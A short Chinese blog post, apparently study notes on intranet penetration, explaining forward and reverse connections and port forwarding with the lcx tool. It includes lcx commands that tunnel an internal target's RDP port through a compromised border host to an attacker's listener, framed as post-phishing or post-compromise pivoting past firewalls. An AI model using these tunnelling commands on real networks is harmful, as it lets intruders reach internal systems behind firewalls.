端口转发

正向连接

正向是攻击者主动连接目标机器

条件:边界机能够支持外网连接且存在外网IP

例子:一般拿下边界机,如web机器,且防火墙可以通过

正向连接

反向连接

反向是目标机器主动连接攻击机,由攻击机开启监听

条件:攻击者监听的设备必须具备有外网访问地址

例子:通过钓鱼进入内网,多数机器是内网IP,但能够上外网,只能用反向连接

反向连接

端口转发

端口转发(Port forwarding):有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法,端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为。

端口转发工具——LCX

• lcx是最为经典的端口转发工具,基于Socket套接字实现端口转发

• 有Windows和Linux两个版本,分别为lcx.exe 和 portmap

LCX——端口转发(正向连接)

将内网靶机的3389端口转发到边界机的8888端口

命令:lcx.exe -tran 8888 靶机ip 3389

场景:由于防火墙限制,只允许8888入站

环境搭建


反向连接

将内网靶机的3389端口转发到攻击机的8888端口

攻击机进行监听:lcx.exe -listen 7777 8888

边界机:lcx.exe -slave 攻击机ip 8888 靶机ip 3389

环境搭建
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 端口转发——SSH
    SSH隧道常用参数说明: -C 压缩传输,加快传输速度 -f 将SSH传输转入后台执行,不占用当前的shell -...
    Mr_RyanXu阅读 767评论 0 1
  • 端口转发和流量代理 ew lcx proxifier
    流量代理之ew 1、ew反向代理(内网机器无公网ip需要反弹到公网,需要在vps监听)vps服务端执行:./ew_...
    q1ya阅读 4,373评论 0 2
  • 【端口转发】利用lcx进行访问内网
    0x01 前言 这周开始准备学习内网渗透的知识,昨天利用Vmware搭建了域环境,今天做了一个小实验,利用lcx端...
    Pino_HD阅读 2,145评论 0 1
  • SSH进行端口转发
    大前提,windows可以使用freesshd做ssh服务器当一级代理,但是它的端口转发功能有bug,所以还是用l...
    jjf012阅读 4,652评论 0 0
  • win7系统端口转发的小问题
    前言 公司软件开发需要一台可以外网访问的服务器。于是需要配置路由器的端口转发。在配置中,掉到一个坑里。脑壳都想疼了...
    有时右逝阅读 834评论 0 0